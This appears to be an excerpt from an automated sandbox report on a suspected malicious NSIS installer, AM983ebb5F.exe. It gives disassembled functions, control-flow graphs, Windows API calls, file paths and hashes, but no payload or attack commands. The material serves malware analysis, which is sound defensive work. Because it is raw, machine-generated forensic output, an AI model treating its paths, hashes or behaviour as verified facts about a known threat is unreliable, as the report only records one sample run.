                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 450 405c63-405c89 call 405f2e 453 405ca2-405ca9 450->453 454 405c8b-405c9d DeleteFileW 450->454 456 405cab-405cad 453->456 457 405cbc-405ccc call 406557 453->457 455 405e1f-405e23 454->455 458 405cb3-405cb6 456->458 459 405dcd-405dd2 456->459 463 405cdb-405cdc call 405e72 457->463 464 405cce-405cd9 lstrcatW 457->464 458->457 458->459 459->455 462 405dd4-405dd7 459->462 465 405de1-405de9 call 4068b4 462->465 466 405dd9-405ddf 462->466 467 405ce1-405ce5 463->467 464->467 465->455 473 405deb-405dff call 405e26 call 405c1b 465->473 466->455 470 405cf1-405cf7 lstrcatW 467->470 471 405ce7-405cef 467->471 474 405cfc-405d18 lstrlenW FindFirstFileW 470->474 471->470 471->474 490 405e01-405e04 473->490 491 405e17-405e1a call 4055dc 473->491 476 405dc2-405dc6 474->476 477 405d1e-405d26 474->477 476->459 481 405dc8 476->481 478 405d46-405d5a call 406557 477->478 479 405d28-405d30 477->479 492 405d71-405d7c call 405c1b 478->492 493 405d5c-405d64 478->493 482 405d32-405d3a 479->482 483 405da5-405db5 FindNextFileW 479->483 481->459 482->478 486 405d3c-405d44 482->486 483->477 489 405dbb-405dbc FindClose 483->489 486->478 486->483 489->476 490->466 494 405e06-405e15 call 4055dc call 406317 490->494 491->455 503 405d9d-405da0 call 4055dc 492->503 504 405d7e-405d81 492->504 493->483 495 405d66-405d6f call 405c63 493->495 494->455 495->483 503->483 507 405d83-405d93 call 4055dc call 406317 504->507 508 405d95-405d9b 504->508 507->483 508->483
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405C8C
                                                                                    • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405CD4
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405CF7
                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405CFD
                                                                                    • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405D0D
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                    • API String ID: 2035342205-1741179443
                                                                                    • Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                    • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                    • Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                    • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                                                                    Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 765 4068b4-4068c8 FindFirstFileW 766 4068d5 765->766 767 4068ca-4068d3 FindClose 765->767 768 4068d7-4068d8 766->768 767->768
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                    • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nsuD53D.tmp, xrefs: 004068B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
                                                                                    • API String ID: 2295610775-2591292428
                                                                                    • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                    • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                    • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                    • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                                                                    Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 202 403fd7-403fe9 203 404150-40415f 202->203 204 403fef-403ff5 202->204 205 404161-4041a9 GetDlgItem * 2 call 4044d6 SetClassLongW call 40140b 203->205 206 4041ae-4041c3 203->206 204->203 207 403ffb-404004 204->207 205->206 209 404203-404208 call 404522 206->209 210 4041c5-4041c8 206->210 211 404006-404013 SetWindowPos 207->211 212 404019-404020 207->212 226 40420d-404228 209->226 214 4041ca-4041d5 call 401389 210->214 215 4041fb-4041fd 210->215 211->212 217 404022-40403c ShowWindow 212->217 218 404064-40406a 212->218 214->215 242 4041d7-4041f6 SendMessageW 214->242 215->209 225 4044a3 215->225 219 404042-404055 GetWindowLongW 217->219 220 40413d-40414b call 40453d 217->220 222 404083-404086 218->222 223 40406c-40407e DestroyWindow 218->223 219->220 227 40405b-40405e ShowWindow 219->227 230 4044a5-4044ac 220->230 231 404088-404094 SetWindowLongW 222->231 232 404099-40409f 222->232 229 404480-404486 223->229 225->230 235 404231-404237 226->235 236 40422a-40422c call 40140b 226->236 227->218 229->225 238 404488-40448e 229->238 231->230 232->220 241 4040a5-4040b4 GetDlgItem 232->241 239 404461-40447a DestroyWindow EndDialog 235->239 240 40423d-404248 235->240 236->235 238->225 244 404490-404499 ShowWindow 238->244 239->229 240->239 245 40424e-40429b call 406594 call 4044d6 * 3 GetDlgItem 240->245 246 4040d3-4040d6 241->246 247 4040b6-4040cd SendMessageW IsWindowEnabled 241->247 242->230 244->225 274 4042a5-4042e1 ShowWindow KiUserCallbackDispatcher call 4044f8 EnableWindow 245->274 275 40429d-4042a2 245->275 249 4040d8-4040d9 246->249 250 4040db-4040de 246->250 247->225 247->246 252 404109-40410e call 4044af 249->252 253 4040e0-4040e6 250->253 254 4040ec-4040f1 250->254 252->220 257 404127-404137 SendMessageW 253->257 258 4040e8-4040ea 253->258 254->257 259 4040f3-4040f9 254->259 257->220 258->252 260 404110-404119 call 40140b 259->260 261 4040fb-404101 call 40140b 259->261 260->220 271 40411b-404125 260->271 270 404107 261->270 270->252 271->270 278 4042e3-4042e4 274->278 279 4042e6 274->279 275->274 280 4042e8-404316 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404318-404329 SendMessageW 280->281 282 40432b 280->282 283 404331-404370 call 40450b call 403fb8 call 406557 lstrlenW call 406594 SetWindowTextW call 401389 281->283 282->283 283->226 294 404376-404378 283->294 294->226 295 40437e-404382 294->295 296 4043a1-4043b5 DestroyWindow 295->296 297 404384-40438a 295->297 296->229 299 4043bb-4043e8 CreateDialogParamW 296->299 297->225 298 404390-404396 297->298 298->226 300 40439c 298->300 299->229 301 4043ee-404445 call 4044d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->225 301->225 306 404447-40445a ShowWindow call 404522 301->306 308 40445f 306->308 308->229
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                    • ShowWindow.USER32(?), ref: 00404033
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                    • DestroyWindow.USER32 ref: 00404072
                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                    • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                    • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                                                                    • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                    • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                    • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 121052019-0
                                                                                    • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                    • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                    • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                    • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                    Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 309 403c29-403c41 call 40694b 312 403c43-403c53 call 40649e 309->312 313 403c55-403c8c call 406425 309->313 322 403caf-403cd8 call 403eff call 405f2e 312->322 317 403ca4-403caa lstrcatW 313->317 318 403c8e-403c9f call 406425 313->318 317->322 318->317 327 403d6a-403d72 call 405f2e 322->327 328 403cde-403ce3 322->328 333 403d80-403da5 LoadImageW 327->333 334 403d74-403d7b call 406594 327->334 328->327 329 403ce9-403d11 call 406425 328->329 329->327 336 403d13-403d17 329->336 338 403e26-403e2e call 40140b 333->338 339 403da7-403dd7 RegisterClassW 333->339 334->333 340 403d29-403d35 lstrlenW 336->340 341 403d19-403d26 call 405e53 336->341 352 403e30-403e33 338->352 353 403e38-403e43 call 403eff 338->353 342 403ef5 339->342 343 403ddd-403e21 SystemParametersInfoW CreateWindowExW 339->343 347 403d37-403d45 lstrcmpiW 340->347 348 403d5d-403d65 call 405e26 call 406557 340->348 341->340 346 403ef7-403efe 342->346 343->338 347->348 351 403d47-403d51 GetFileAttributesW 347->351 348->327 355 403d53-403d55 351->355 356 403d57-403d58 call 405e72 351->356 352->346 362 403e49-403e63 ShowWindow call 4068db 353->362 363 403ecc-403ecd call 4056af 353->363 355->348 355->356 356->348 368 403e65-403e6a call 4068db 362->368 369 403e6f-403e81 GetClassInfoW 362->369 366 403ed2-403ed4 363->366 370 403ed6-403edc 366->370 371 403eee-403ef0 call 40140b 366->371 368->369 374 403e83-403e93 GetClassInfoW RegisterClassW 369->374 375 403e99-403ebc DialogBoxParamW call 40140b 369->375 370->352 376 403ee2-403ee9 call 40140b 370->376 371->342 374->375 379 403ec1-403eca call 403b79 375->379 376->352 379->346
                                                                                    APIs
                                                                                      • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                      • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                    • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",00008001), ref: 00403CAA
                                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91
                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                    • API String ID: 1975747703-2535878264
                                                                                    • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                    • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                    • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                    • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                                                    Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 403 403205-403208 396->403 404 403258-40325d 396->404 400 403130-403139 call 4034d4 398->400 401 40312e 398->401 408 40325f-403267 call 40301e 400->408 409 40313f-403146 400->409 401->400 406 40320a-403222 call 4034ea call 4034d4 403->406 407 40322c-403256 GlobalAlloc call 4034ea call 4032b9 403->407 404->388 406->404 429 403224-40322a 406->429 407->404 434 403269-40327a 407->434 408->404 413 4031c2-4031c6 409->413 414 403148-40315c call 406002 409->414 418 4031d0-4031d6 413->418 419 4031c8-4031cf call 40301e 413->419 414->418 432 40315e-403165 414->432 425 4031e5-4031ed 418->425 426 4031d8-4031e2 call 406a38 418->426 419->418 425->398 433 4031f3 425->433 426->425 429->404 429->407 432->418 436 403167-40316e 432->436 433->396 437 403282-403287 434->437 438 40327c 434->438 436->418 440 403170-403177 436->440 439 403288-40328e 437->439 438->437 439->439 441 403290-4032ab SetFilePointer call 406002 439->441 440->418 442 403179-403180 440->442 445 4032b0 441->445 442->418 444 403182-4031a2 442->444 444->404 446 4031a8-4031ac 444->446 445->388 447 4031b4-4031bc 446->447 448 4031ae-4031b2 446->448 447->418 449 4031be-4031c0 447->449 448->433 448->447 449->418
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AM983ebb5F.exe,00000400), ref: 004030AF
                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 0040604B
                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AM983ebb5F.exe,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 004030FB
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\AM983ebb5F.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-1577082933
                                                                                    • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                    • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                    • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                    • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                                                    Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 514 406594-40659d 515 4065b0-4065ca 514->515 516 40659f-4065ae 514->516 517 4065d0-4065dc 515->517 518 4067da-4067e0 515->518 516->515 517->518 519 4065e2-4065e9 517->519 520 4067e6-4067f3 518->520 521 4065ee-4065fb 518->521 519->518 523 4067f5-4067fa call 406557 520->523 524 4067ff-406802 520->524 521->520 522 406601-40660a 521->522 525 406610-406653 522->525 526 4067c7 522->526 523->524 530 406659-406665 525->530 531 40676b-40676f 525->531 528 4067d5-4067d8 526->528 529 4067c9-4067d3 526->529 528->518 529->518 532 406667 530->532 533 40666f-406671 530->533 534 406771-406778 531->534 535 4067a3-4067a7 531->535 532->533 540 406673-406699 call 406425 533->540 541 4066ab-4066ae 533->541 538 406788-406794 call 406557 534->538 539 40677a-406786 call 40649e 534->539 536 4067b7-4067c5 lstrlenW 535->536 537 4067a9-4067b2 call 406594 535->537 536->518 537->536 549 406799-40679f 538->549 539->549 554 406753-406756 540->554 555 40669f-4066a6 call 406594 540->555 543 4066b0-4066bc GetSystemDirectoryW 541->543 544 4066c1-4066c4 541->544 550 40674e-406751 543->550 551 4066d6-4066da 544->551 552 4066c6-4066d2 GetWindowsDirectoryW 544->552 549->536 556 4067a1 549->556 550->554 557 406763-406769 call 406805 550->557 551->550 558 4066dc-4066fa 551->558 552->551 554->557 560 406758-40675e lstrcatW 554->560 555->550 556->557 557->536 562 4066fc-406702 558->562 563 40670e-406726 call 40694b 558->563 560->557 567 40670a-40670c 562->567 571 406728-40673b SHGetPathFromIDListW CoTaskMemFree 563->571 572 40673d-406746 563->572 567->563 569 406748-40674c 567->569 569->550 571->569 571->572 572->558 572->569
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
                                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004066CC
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 0040675E
                                                                                    • lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004067B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
